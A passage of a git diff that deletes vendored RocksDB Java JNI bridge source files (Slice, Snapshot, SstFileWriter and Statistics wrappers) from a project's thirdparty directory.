-  auto* column_family =
-      reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  auto* ifo =
-      reinterpret_cast<rocksdb::IngestExternalFileOptions*>(
-          jingest_external_file_options_handle);
-  rocksdb::Status s =
-      db->IngestExternalFile(column_family, file_path_list, *ifo);
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/slice.cc b/thirdparty/rocksdb/java/rocksjni/slice.cc
deleted file mode 100644
index ef0e384..0000000
--- a/thirdparty/rocksdb/java/rocksjni/slice.cc
+++ /dev/null
@@ -1,349 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for
-// rocksdb::Slice.
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-#include <string>
-
-#include "include/org_rocksdb_AbstractSlice.h"
-#include "include/org_rocksdb_Slice.h"
-#include "include/org_rocksdb_DirectSlice.h"
-#include "rocksdb/slice.h"
-#include "rocksjni/portal.h"
-
-// <editor-fold desc="org.rocksdb.AbstractSlice>
-
-/*
- * Class:     org_rocksdb_AbstractSlice
- * Method:    createNewSliceFromString
- * Signature: (Ljava/lang/String;)J
- */
-jlong Java_org_rocksdb_AbstractSlice_createNewSliceFromString(
-    JNIEnv * env, jclass jcls, jstring jstr) {
-  const auto* str = env->GetStringUTFChars(jstr, nullptr);
-  if(str == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-
-  const size_t len = strlen(str);
-
-  // NOTE: buf will be deleted in the
-  // Java_org_rocksdb_Slice_disposeInternalBuf or
-  // or Java_org_rocksdb_DirectSlice_disposeInternalBuf methods
-  char* buf = new char[len + 1];
-  memcpy(buf, str, len);
-  buf[len] = 0;
-  env->ReleaseStringUTFChars(jstr, str);
-
-  const auto* slice = new rocksdb::Slice(buf);
-  return reinterpret_cast<jlong>(slice);
-}
-
-/*
- * Class:     org_rocksdb_AbstractSlice
- * Method:    size0
- * Signature: (J)I
- */
-jint Java_org_rocksdb_AbstractSlice_size0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  const auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  return static_cast<jint>(slice->size());
-}
-
-/*
- * Class:     org_rocksdb_AbstractSlice
- * Method:    empty0
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_AbstractSlice_empty0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  const auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  return slice->empty();
-}
-
-/*
- * Class:     org_rocksdb_AbstractSlice
- * Method:    toString0
- * Signature: (JZ)Ljava/lang/String;
- */
-jstring Java_org_rocksdb_AbstractSlice_toString0(
-    JNIEnv* env, jobject jobj, jlong handle, jboolean hex) {
-  const auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  const std::string s = slice->ToString(hex);
-  return env->NewStringUTF(s.c_str());
-}
-
-/*
- * Class:     org_rocksdb_AbstractSlice
- * Method:    compare0
- * Signature: (JJ)I;
- */
-jint Java_org_rocksdb_AbstractSlice_compare0(
-    JNIEnv* env, jobject jobj, jlong handle, jlong otherHandle) {
-  const auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  const auto* otherSlice =
-    reinterpret_cast<rocksdb::Slice*>(otherHandle);
-  return slice->compare(*otherSlice);
-}
-
-/*
- * Class:     org_rocksdb_AbstractSlice
- * Method:    startsWith0
- * Signature: (JJ)Z;
- */
-jboolean Java_org_rocksdb_AbstractSlice_startsWith0(
-    JNIEnv* env, jobject jobj, jlong handle, jlong otherHandle) {
-  const auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  const auto* otherSlice =
-    reinterpret_cast<rocksdb::Slice*>(otherHandle);
-  return slice->starts_with(*otherSlice);
-}
-
-/*
- * Class:     org_rocksdb_AbstractSlice
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_AbstractSlice_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  delete reinterpret_cast<rocksdb::Slice*>(handle);
-}
-
-// </editor-fold>
-
-// <editor-fold desc="org.rocksdb.Slice>
-
-/*
- * Class:     org_rocksdb_Slice
- * Method:    createNewSlice0
- * Signature: ([BI)J
- */
-jlong Java_org_rocksdb_Slice_createNewSlice0(
-    JNIEnv * env, jclass jcls, jbyteArray data, jint offset) {
-  const jsize dataSize = env->GetArrayLength(data);
-  const int len = dataSize - offset;
-
-  // NOTE: buf will be deleted in the Java_org_rocksdb_Slice_disposeInternalBuf method
-  jbyte* buf = new jbyte[len];
-  env->GetByteArrayRegion(data, offset, len, buf);
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    return 0;
-  }
-
-  const auto* slice = new rocksdb::Slice((const char*)buf, len);
-  return reinterpret_cast<jlong>(slice);
-}
-
-/*
- * Class:     org_rocksdb_Slice
- * Method:    createNewSlice1
- * Signature: ([B)J
- */
-jlong Java_org_rocksdb_Slice_createNewSlice1(
-    JNIEnv * env, jclass jcls, jbyteArray data) {
-  jbyte* ptrData = env->GetByteArrayElements(data, nullptr);
-  if(ptrData == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-  const int len = env->GetArrayLength(data) + 1;
-
-  // NOTE: buf will be deleted in the Java_org_rocksdb_Slice_disposeInternalBuf method
-  char* buf = new char[len];
-  memcpy(buf, ptrData, len - 1);
-  buf[len-1] = '\0';
-
-  const auto* slice =
-      new rocksdb::Slice(buf, len - 1);
-
-  env->ReleaseByteArrayElements(data, ptrData, JNI_ABORT);
-
-  return reinterpret_cast<jlong>(slice);
-}
-
-/*
- * Class:     org_rocksdb_Slice
- * Method:    data0
- * Signature: (J)[B
- */
-jbyteArray Java_org_rocksdb_Slice_data0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  const auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  const jsize len = static_cast<jsize>(slice->size());
-  const jbyteArray data = env->NewByteArray(len);
-  if(data == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-  
-  env->SetByteArrayRegion(data, 0, len,
-    const_cast<jbyte*>(reinterpret_cast<const jbyte*>(slice->data())));
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    env->DeleteLocalRef(data);
-    return nullptr;
-  }
-
-  return data;
-}
-
-/*
- * Class:     org_rocksdb_Slice
- * Method:    clear0
- * Signature: (JZJ)V
- */
-void Java_org_rocksdb_Slice_clear0(
-    JNIEnv * env, jobject jobj, jlong handle, jboolean shouldRelease,
-    jlong internalBufferOffset) {
-  auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  if(shouldRelease == JNI_TRUE) {
-    const char* buf = slice->data_ - internalBufferOffset;
-    delete [] buf;
-  }
-  slice->clear();
-}
-
-/*
- * Class:     org_rocksdb_Slice
- * Method:    removePrefix0
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Slice_removePrefix0(
-    JNIEnv * env, jobject jobj, jlong handle, jint length) {
-  auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  slice->remove_prefix(length);
-}
-
-/*
- * Class:     org_rocksdb_Slice
- * Method:    disposeInternalBuf
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Slice_disposeInternalBuf(
-    JNIEnv * env, jobject jobj, jlong handle, jlong internalBufferOffset) {
-  const auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  const char* buf = slice->data_ - internalBufferOffset;
-  delete [] buf;
-}
-
-// </editor-fold>
-
-// <editor-fold desc="org.rocksdb.DirectSlice>
-
-/*
- * Class:     org_rocksdb_DirectSlice
- * Method:    createNewDirectSlice0
- * Signature: (Ljava/nio/ByteBuffer;I)J
- */
-jlong Java_org_rocksdb_DirectSlice_createNewDirectSlice0(
-    JNIEnv* env, jclass jcls, jobject data, jint length) {
-  assert(data != nullptr);
-  void* data_addr = env->GetDirectBufferAddress(data);
-  if(data_addr == nullptr) {
-    // error: memory region is undefined, given object is not a direct
-    // java.nio.Buffer, or JNI access to direct buffers is not supported by JVM
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument(
-            "Could not access DirectBuffer"));
-    return 0;
-  }
-
-  const auto* ptrData =
-     reinterpret_cast<char*>(data_addr);
-  const auto* slice = new rocksdb::Slice(ptrData, length);
-  return reinterpret_cast<jlong>(slice);
-}
-
-/*
- * Class:     org_rocksdb_DirectSlice
- * Method:    createNewDirectSlice1
- * Signature: (Ljava/nio/ByteBuffer;)J
- */
-jlong Java_org_rocksdb_DirectSlice_createNewDirectSlice1(
-    JNIEnv* env, jclass jcls, jobject data) {
-  void* data_addr = env->GetDirectBufferAddress(data);
-  if(data_addr == nullptr) {
-    // error: memory region is undefined, given object is not a direct
-    // java.nio.Buffer, or JNI access to direct buffers is not supported by JVM
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument(
-            "Could not access DirectBuffer"));
-    return 0;
-  }
-
-  const auto* ptrData = reinterpret_cast<char*>(data_addr);
-  const auto* slice = new rocksdb::Slice(ptrData);
-  return reinterpret_cast<jlong>(slice);
-}
-
-/*
- * Class:     org_rocksdb_DirectSlice
- * Method:    data0
- * Signature: (J)Ljava/lang/Object;
- */
-jobject Java_org_rocksdb_DirectSlice_data0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  const auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  return env->NewDirectByteBuffer(const_cast<char*>(slice->data()),
-    slice->size());
-}
-
-/*
- * Class:     org_rocksdb_DirectSlice
- * Method:    get0
- * Signature: (JI)B
- */
-jbyte Java_org_rocksdb_DirectSlice_get0(
-    JNIEnv* env, jobject jobj, jlong handle, jint offset) {
-  const auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  return (*slice)[offset];
-}
-
-/*
- * Class:     org_rocksdb_DirectSlice
- * Method:    clear0
- * Signature: (JZJ)V
- */
-void Java_org_rocksdb_DirectSlice_clear0(
-    JNIEnv* env, jobject jobj, jlong handle,
-    jboolean shouldRelease, jlong internalBufferOffset) {
-  auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  if(shouldRelease == JNI_TRUE) {
-    const char* buf = slice->data_ - internalBufferOffset;
-    delete [] buf;
-  }
-  slice->clear();
-}
-
-/*
- * Class:     org_rocksdb_DirectSlice
- * Method:    removePrefix0
- * Signature: (JI)V
- */
-void Java_org_rocksdb_DirectSlice_removePrefix0(
-    JNIEnv* env, jobject jobj, jlong handle, jint length) {
-  auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  slice->remove_prefix(length);
-}
-
-/*
- * Class:     org_rocksdb_DirectSlice
- * Method:    disposeInternalBuf
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DirectSlice_disposeInternalBuf(
-    JNIEnv* env, jobject jobj, jlong handle, jlong internalBufferOffset) {
-  const auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  const char* buf = slice->data_ - internalBufferOffset;
-  delete [] buf;
-}
-
-// </editor-fold>
diff --git a/thirdparty/rocksdb/java/rocksjni/snapshot.cc b/thirdparty/rocksdb/java/rocksjni/snapshot.cc
deleted file mode 100644
index 04a0ebf..0000000
--- a/thirdparty/rocksdb/java/rocksjni/snapshot.cc
+++ /dev/null
@@ -1,26 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++.
-
-#include <jni.h>
-#include <stdio.h>
-#include <stdlib.h>
-
-#include "include/org_rocksdb_Snapshot.h"
-#include "rocksdb/db.h"
-#include "rocksjni/portal.h"
-
-/*
- * Class:     org_rocksdb_Snapshot
- * Method:    getSequenceNumber
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Snapshot_getSequenceNumber(JNIEnv* env,
-    jobject jobj, jlong jsnapshot_handle) {
-  auto* snapshot = reinterpret_cast<rocksdb::Snapshot*>(
-      jsnapshot_handle);
-  return snapshot->GetSequenceNumber();
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/sst_file_writerjni.cc b/thirdparty/rocksdb/java/rocksjni/sst_file_writerjni.cc
deleted file mode 100644
index ceb9338..0000000
--- a/thirdparty/rocksdb/java/rocksjni/sst_file_writerjni.cc
+++ /dev/null
@@ -1,248 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling C++ rocksdb::SstFileWriter methods
-// from Java side.
-
-#include <jni.h>
-#include <string>
-
-#include "include/org_rocksdb_SstFileWriter.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "rocksdb/sst_file_writer.h"
-#include "rocksjni/portal.h"
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    newSstFileWriter
- * Signature: (JJJ)J
- */
-jlong Java_org_rocksdb_SstFileWriter_newSstFileWriter__JJJ(JNIEnv *env, jclass jcls,
-                                                      jlong jenvoptions,
-                                                      jlong joptions,
-                                                      jlong jcomparator) {
-  auto *env_options =
-      reinterpret_cast<const rocksdb::EnvOptions *>(jenvoptions);
-  auto *options = reinterpret_cast<const rocksdb::Options *>(joptions);
-  auto *comparator = reinterpret_cast<const rocksdb::Comparator *>(jcomparator);
-  rocksdb::SstFileWriter *sst_file_writer =
-      new rocksdb::SstFileWriter(*env_options, *options, comparator);
-  return reinterpret_cast<jlong>(sst_file_writer);
-}
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    newSstFileWriter
- * Signature: (JJ)J
- */
-jlong Java_org_rocksdb_SstFileWriter_newSstFileWriter__JJ(JNIEnv *env, jclass jcls,
-                                                      jlong jenvoptions,
-                                                      jlong joptions) {
-  auto *env_options =
-      reinterpret_cast<const rocksdb::EnvOptions *>(jenvoptions);
-  auto *options = reinterpret_cast<const rocksdb::Options *>(joptions);
-  rocksdb::SstFileWriter *sst_file_writer =
-      new rocksdb::SstFileWriter(*env_options, *options);
-  return reinterpret_cast<jlong>(sst_file_writer);
-}
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    open
- * Signature: (JLjava/lang/String;)V
- */
-void Java_org_rocksdb_SstFileWriter_open(JNIEnv *env, jobject jobj,
-                                         jlong jhandle, jstring jfile_path) {
-  const char *file_path = env->GetStringUTFChars(jfile_path, nullptr);
-  if(file_path == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-  rocksdb::Status s =
-      reinterpret_cast<rocksdb::SstFileWriter *>(jhandle)->Open(file_path);
-  env->ReleaseStringUTFChars(jfile_path, file_path);
-
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    put
- * Signature: (JJJ)V
- */
-void Java_org_rocksdb_SstFileWriter_put__JJJ(JNIEnv *env, jobject jobj,
-                                             jlong jhandle, jlong jkey_handle,
-                                             jlong jvalue_handle) {
-  auto *key_slice = reinterpret_cast<rocksdb::Slice *>(jkey_handle);
-  auto *value_slice = reinterpret_cast<rocksdb::Slice *>(jvalue_handle);
-  rocksdb::Status s =
-    reinterpret_cast<rocksdb::SstFileWriter *>(jhandle)->Put(*key_slice,
-                                                             *value_slice);
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    put
- * Signature: (JJJ)V
- */
- void Java_org_rocksdb_SstFileWriter_put__J_3B_3B(JNIEnv *env, jobject jobj,
-                                                  jlong jhandle, jbyteArray jkey,
-                                                  jbyteArray jval) {
-  jbyte* key = env->GetByteArrayElements(jkey, nullptr);
-  if(key == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-  rocksdb::Slice key_slice(
-      reinterpret_cast<char*>(key),  env->GetArrayLength(jkey));
-
-  jbyte* value = env->GetByteArrayElements(jval, nullptr);
-  if(value == nullptr) {
-    // exception thrown: OutOfMemoryError
-    env->ReleaseByteArrayElements(jkey, key, JNI_ABORT);
-    return;
-  }
-  rocksdb::Slice value_slice(
-      reinterpret_cast<char*>(value),  env->GetArrayLength(jval));
-
-  rocksdb::Status s =
-  reinterpret_cast<rocksdb::SstFileWriter *>(jhandle)->Put(key_slice,
-                                                           value_slice);
-
-  env->ReleaseByteArrayElements(jkey, key, JNI_ABORT);
-  env->ReleaseByteArrayElements(jval, value, JNI_ABORT);
-
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    merge
- * Signature: (JJJ)V
- */
-void Java_org_rocksdb_SstFileWriter_merge__JJJ(JNIEnv *env, jobject jobj,
-                                               jlong jhandle, jlong jkey_handle,
-                                               jlong jvalue_handle) {
-  auto *key_slice = reinterpret_cast<rocksdb::Slice *>(jkey_handle);
-  auto *value_slice = reinterpret_cast<rocksdb::Slice *>(jvalue_handle);
-  rocksdb::Status s =
-    reinterpret_cast<rocksdb::SstFileWriter *>(jhandle)->Merge(*key_slice,
-                                                               *value_slice);
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    merge
- * Signature: (J[B[B)V
- */
-void Java_org_rocksdb_SstFileWriter_merge__J_3B_3B(JNIEnv *env, jobject jobj,
-                                                   jlong jhandle, jbyteArray jkey,
-                                                   jbyteArray jval) {
-
-  jbyte* key = env->GetByteArrayElements(jkey, nullptr);
-  if(key == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-  rocksdb::Slice key_slice(
-      reinterpret_cast<char*>(key),  env->GetArrayLength(jkey));
-
-  jbyte* value = env->GetByteArrayElements(jval, nullptr);
-  if(value == nullptr) {
-    // exception thrown: OutOfMemoryError
-    env->ReleaseByteArrayElements(jkey, key, JNI_ABORT);
-    return;
-  }
-  rocksdb::Slice value_slice(
-      reinterpret_cast<char*>(value),  env->GetArrayLength(jval));
-
-  rocksdb::Status s =
-    reinterpret_cast<rocksdb::SstFileWriter *>(jhandle)->Merge(key_slice,
-                                                               value_slice);
-
-  env->ReleaseByteArrayElements(jkey, key, JNI_ABORT);
-  env->ReleaseByteArrayElements(jval, value, JNI_ABORT);
-
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    delete
- * Signature: (JJJ)V
- */
-void Java_org_rocksdb_SstFileWriter_delete__J_3B(JNIEnv *env, jobject jobj,
-                                               jlong jhandle, jbyteArray jkey) {
-  jbyte* key = env->GetByteArrayElements(jkey, nullptr);
-  if(key == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-  rocksdb::Slice key_slice(
-      reinterpret_cast<char*>(key),  env->GetArrayLength(jkey));
-
-  rocksdb::Status s =
-    reinterpret_cast<rocksdb::SstFileWriter *>(jhandle)->Delete(key_slice);
-
-  env->ReleaseByteArrayElements(jkey, key, JNI_ABORT);
-
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    delete
- * Signature: (JJJ)V
- */
- void Java_org_rocksdb_SstFileWriter_delete__JJ(JNIEnv *env, jobject jobj,
-  jlong jhandle, jlong jkey_handle) {
-  auto *key_slice = reinterpret_cast<rocksdb::Slice *>(jkey_handle);
-  rocksdb::Status s =
-    reinterpret_cast<rocksdb::SstFileWriter *>(jhandle)->Delete(*key_slice);
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    finish
- * Signature: (J)V
- */
-void Java_org_rocksdb_SstFileWriter_finish(JNIEnv *env, jobject jobj,
-                                           jlong jhandle) {
-  rocksdb::Status s =
-      reinterpret_cast<rocksdb::SstFileWriter *>(jhandle)->Finish();
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_SstFileWriter_disposeInternal(JNIEnv *env, jobject jobj,
-                                                    jlong jhandle) {
-  delete reinterpret_cast<rocksdb::SstFileWriter *>(jhandle);
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/statistics.cc b/thirdparty/rocksdb/java/rocksjni/statistics.cc
deleted file mode 100644
index 7b657ad..0000000
--- a/thirdparty/rocksdb/java/rocksjni/statistics.cc
+++ /dev/null
@@ -1,244 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::Statistics methods from Java side.
-
-#include <jni.h>
-#include <memory>
-#include <set>
-
-#include "include/org_rocksdb_Statistics.h"
-#include "rocksjni/portal.h"
-#include "rocksjni/statisticsjni.h"
-#include "rocksdb/statistics.h"
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    newStatistics
- * Signature: ()J
- */
-jlong Java_org_rocksdb_Statistics_newStatistics__(JNIEnv* env, jclass jcls) {
-  return Java_org_rocksdb_Statistics_newStatistics___3BJ(
-      env, jcls, nullptr, 0);
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    newStatistics
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Statistics_newStatistics__J(
-    JNIEnv* env, jclass jcls, jlong jother_statistics_handle) {
-  return Java_org_rocksdb_Statistics_newStatistics___3BJ(
-      env, jcls, nullptr, jother_statistics_handle);
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    newStatistics
- * Signature: ([B)J
- */
-jlong Java_org_rocksdb_Statistics_newStatistics___3B(
-    JNIEnv* env, jclass jcls, jbyteArray jhistograms) {
-  return Java_org_rocksdb_Statistics_newStatistics___3BJ(
-      env, jcls, jhistograms, 0);
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    newStatistics
- * Signature: ([BJ)J
- */
-jlong Java_org_rocksdb_Statistics_newStatistics___3BJ(
-    JNIEnv* env, jclass jcls, jbyteArray jhistograms,
-    jlong jother_statistics_handle) {
-
-  std::shared_ptr<rocksdb::Statistics>* pSptr_other_statistics = nullptr;
-  if (jother_statistics_handle > 0) {
-    pSptr_other_statistics =
-        reinterpret_cast<std::shared_ptr<rocksdb::Statistics>*>(
-            jother_statistics_handle);
-  }
-
-  std::set<uint32_t> histograms;
-  if (jhistograms != nullptr) {
-    const jsize len = env->GetArrayLength(jhistograms);
-    if (len > 0) {
-      jbyte* jhistogram = env->GetByteArrayElements(jhistograms, nullptr);
-      if (jhistogram == nullptr ) {
-        // exception thrown: OutOfMemoryError
-        return 0;
-      }
-
-      for (jsize i = 0; i < len; i++) {
-        const rocksdb::Histograms histogram =
-            rocksdb::HistogramTypeJni::toCppHistograms(jhistogram[i]);
-        histograms.emplace(histogram);
-      }
-
-      env->ReleaseByteArrayElements(jhistograms, jhistogram, JNI_ABORT);
-    }
-  }
-
-  std::shared_ptr<rocksdb::Statistics> sptr_other_statistics = nullptr;
-  if (pSptr_other_statistics != nullptr) {
-      sptr_other_statistics =   *pSptr_other_statistics;
-  }
-
-  auto* pSptr_statistics = new std::shared_ptr<rocksdb::StatisticsJni>(
-      new rocksdb::StatisticsJni(sptr_other_statistics, histograms));
-
-  return reinterpret_cast<jlong>(pSptr_statistics);
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_Statistics_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  if(jhandle > 0) {
-    auto* pSptr_statistics =
-        reinterpret_cast<std::shared_ptr<rocksdb::Statistics>*>(jhandle);
-    delete pSptr_statistics;
-  }
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    statsLevel
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_Statistics_statsLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* pSptr_statistics =
-      reinterpret_cast<std::shared_ptr<rocksdb::Statistics>*>(jhandle);
-  assert(pSptr_statistics != nullptr);
-  return rocksdb::StatsLevelJni::toJavaStatsLevel(pSptr_statistics->get()->stats_level_);
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    setStatsLevel
- * Signature: (JB)V
- */
-void Java_org_rocksdb_Statistics_setStatsLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jstats_level) {
-  auto* pSptr_statistics =
-      reinterpret_cast<std::shared_ptr<rocksdb::Statistics>*>(jhandle);
-  assert(pSptr_statistics != nullptr);
-  auto stats_level = rocksdb::StatsLevelJni::toCppStatsLevel(jstats_level);
-  pSptr_statistics->get()->stats_level_ = stats_level;
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    getTickerCount
- * Signature: (JB)J
- */
-jlong Java_org_rocksdb_Statistics_getTickerCount(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jticker_type) {
-  auto* pSptr_statistics =
-      reinterpret_cast<std::shared_ptr<rocksdb::Statistics>*>(jhandle);
-  assert(pSptr_statistics != nullptr);
-  auto ticker = rocksdb::TickerTypeJni::toCppTickers(jticker_type);
-  return pSptr_statistics->get()->getTickerCount(ticker);
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    getAndResetTickerCount
- * Signature: (JB)J
- */
-jlong Java_org_rocksdb_Statistics_getAndResetTickerCount(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jticker_type) {
-  auto* pSptr_statistics =
-      reinterpret_cast<std::shared_ptr<rocksdb::Statistics>*>(jhandle);
-  assert(pSptr_statistics != nullptr);
-  auto ticker = rocksdb::TickerTypeJni::toCppTickers(jticker_type);
-  return pSptr_statistics->get()->getAndResetTickerCount(ticker);
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    getHistogramData
- * Signature: (JB)Lorg/rocksdb/HistogramData;
- */
-jobject Java_org_rocksdb_Statistics_getHistogramData(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jhistogram_type) {
-  auto* pSptr_statistics =
-      reinterpret_cast<std::shared_ptr<rocksdb::Statistics>*>(jhandle);
-  assert(pSptr_statistics != nullptr);
-
-  rocksdb::HistogramData data;  // TODO(AR) perhaps better to construct a Java Object Wrapper that uses ptr to C++ `new HistogramData`
-  auto histogram = rocksdb::HistogramTypeJni::toCppHistograms(jhistogram_type);
-  pSptr_statistics->get()->histogramData(
-      static_cast<rocksdb::Histograms>(histogram), &data);
-
-  jclass jclazz = rocksdb::HistogramDataJni::getJClass(env);
-  if(jclazz == nullptr) {
-    // exception occurred accessing class
-    return nullptr;
-  }
-
-  jmethodID mid = rocksdb::HistogramDataJni::getConstructorMethodId(
-      env);
-  if(mid == nullptr) {
-    // exception occurred accessing method
-    return nullptr;
-  }
-
-  return env->NewObject(
-      jclazz,
-      mid, data.median, data.percentile95,data.percentile99, data.average,
-      data.standard_deviation);
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    getHistogramString
- * Signature: (JB)Ljava/lang/String;
- */
-jstring Java_org_rocksdb_Statistics_getHistogramString(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jhistogram_type) {
-  auto* pSptr_statistics =
-      reinterpret_cast<std::shared_ptr<rocksdb::Statistics>*>(jhandle);
-  assert(pSptr_statistics != nullptr);
-  auto histogram = rocksdb::HistogramTypeJni::toCppHistograms(jhistogram_type);
-  auto str = pSptr_statistics->get()->getHistogramString(histogram);
-  return env->NewStringUTF(str.c_str());
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    reset
- * Signature: (J)V
- */
-void Java_org_rocksdb_Statistics_reset(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-   auto* pSptr_statistics =
-      reinterpret_cast<std::shared_ptr<rocksdb::Statistics>*>(jhandle);
-  assert(pSptr_statistics != nullptr);
-  rocksdb::Status s = pSptr_statistics->get()->Reset();
-  if (!s.ok()) {
-   rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    toString
- * Signature: (J)Ljava/lang/String;
- */
-jstring Java_org_rocksdb_Statistics_toString(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-   auto* pSptr_statistics =
-      reinterpret_cast<std::shared_ptr<rocksdb::Statistics>*>(jhandle);
-  assert(pSptr_statistics != nullptr);
-  auto str = pSptr_statistics->get()->ToString();
-  return env->NewStringUTF(str.c_str());
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/statisticsjni.cc b/thirdparty/rocksdb/java/rocksjni/statisticsjni.cc
deleted file mode 100644
index 584ab5a..0000000
